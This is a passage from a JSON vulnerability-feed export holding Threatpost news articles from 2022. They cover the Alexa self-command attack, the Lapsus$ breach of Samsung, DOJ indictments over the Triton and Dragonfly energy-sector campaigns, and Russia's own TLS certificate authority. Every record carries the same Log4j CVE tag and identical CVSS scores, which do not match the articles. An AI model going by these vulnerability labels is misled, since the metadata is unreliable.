"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement. _\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.\n\nAs energy news outlet E&amp;E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh\u2019s sprawling refinery along Saudi Arbia\u2019s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline \u201cin a last-gasp effort to prevent a gas release and deadly explosion.\u201d\n\n\u201c[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,\u201d according to E&amp;E News.\n\nGladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.\n\n## FSB Officers\u2019 Indictment: The Dragonfly Supply-Chain Attack\n\nThe indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, \u201cin furtherance of the Russian government\u2019s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.\u201d\n\nSpecifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\n\u201cAccess to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,\u201d according to the DOJ\u2019s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).\n\nThe indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as \u201cDragonfly\u201d or \u201cHavex\u201d by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.\n\nIt involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.\n\n\u201cAfter unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims\u2019 networks for additional ICS/SCADA devices,\u201d according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.\n\n## Dragonfly 2.0: Spearphishing a Nuclear Power Plant\n\nBetween 2014 and 2017, the campaign entered into what\u2019s commonly referred to as \u201cDragonfly 2.0,\u201d wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.\n\nThis second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.\n\nThe spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.\n\n\u201cMoreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,\u201d according to the DOJ.\n\nDragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software ](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>)(CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. \u201cWhen the engineers browsed to a compromised website, the conspirators\u2019 hidden scripts deployed malware designed to capture login credentials onto their computers,\u201d the DOJ said.\n\nThe campaign targeted victims in the United States and in more than 135 other countries, the Feds said.\n\nThe FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and commit computer fraud and abuse and conspiracy to commit wire fraud. Akulov and Gavrilov are also charged with substantive counts of wire fraud and computer fraud related to unlawfully obtaining information from computers and causing damage to computers. Akulov and Gavrilov are also charged with three counts of aggravated identity theft.\n\n## Still Gaping Security Holes in Energy Companies\n\nLookingGlass CEO Gilman Louie, an expert on national security and cybersecurity who regularly shares or analyzes intel with government agencies, told Threatpost on Friday that legal actions against the potential operators of the critically dangerous Triton malware are welcome: They\u2019re a \u201cpositive move [that] sends a strong message to cybercrime and nation-state actors globally,\u201d he said via email.\n\nOn the less-positive side, a recent LookingGlass cyber profile of the U.S. Energy sector looks grim.\n\nMany energy companies are sitting ducks, with current cybersecurity exposures that have already been exploited by Russian actors in the past, including open ports that enable threat actors to gain full remote access.\n\nThe report shares vulnerabilities and exposures that Russian hackers are known to have used. \u201cFor years, energy companies have been hammered on securing their operational technology. The Triton attacks show why this is important,\u201d Louie noted.\n\nBut he stated that \u201corganizations also need to ensure they\u2019re improving security on their traditional IT side.\u201d He pointed to the Colonial Pipeline attack as an example of how adversaries \u201cdidn\u2019t need in-depth knowledge of [operational technology, or OT] to shut down the flow of gas or oil.\u201d \n\nLookingGlass research shows that, across the energy sector, there are vulnerabilities that are more than 5 years old that haven\u2019t been dealt with, and open ports like remote desktop that are \u201cbasically unprotected doors into an organization.\u201d\n\nEnergy companies need to be patching or updating their systems, Louie said and shutting those open doors: \u201cIf they really need a port open for remote desktop, then they need to add layers of compensating security controls to make sure it\u2019s not easy to exploit.\u201d\n\nWhen unsealing the indictments, the government noted that it\u2019s taking action to [enhance private sector network defense efforts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-083a>) and to [disrupt similar malicious activity](<https://protect2.fireeye.com/v1/url?k=73f0be82-2c6b867e-73f79a67-ac1f6b01771c-a72e8f7b8ceb667b&q=1&e=d2252912-db07-4b30-8381-4dbd442acfc0&u=https%3A%2F%2Frewardsforjustice.net%2Findex%2F%3Fjsf%3Djet-engine%3Arewards-grid%26tax%3Dcyber%3A857>).\n\nOther security issues that Russian actors have leveraged, which companies need to address immediately before they are used for attacks that could be bigger than those we\u2019ve already seen, include:\n\n * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.\n * [**Port 161 \u2013 SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are unsecure and allow threat actors to eavesdrop or manipulate data.\n * **Port 139/445 \u2013 SMB: **The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.\n\nThese are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass\u2019s research.\n\nIt\u2019s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now\u2019s the time for companies to find and mitigate the holes that let them in, Louie said.\n\n\u201cEnergy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by foreign countries. As it is, a pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizen\u2019s access to websites.\n\nAs it is, Russian sites are stuck, unable to renew their certs because sanctions keep signing authorities in many countries unable to accept payments from Russia, according to[ BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 more commonly known as SSL, or TLS/SSL \u2013 is a cryptographic protocol that secures the internet by encrypting data sent between your browser, the websites you visit and the website\u2019s server. The certificates keep data transmission private and prevent modification, loss or theft, as digicert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a[ notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers that were recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomebody with a Mozilla domain email on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new root Russia cert, pointing to the possibility of the Russian government using it to start mand-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends 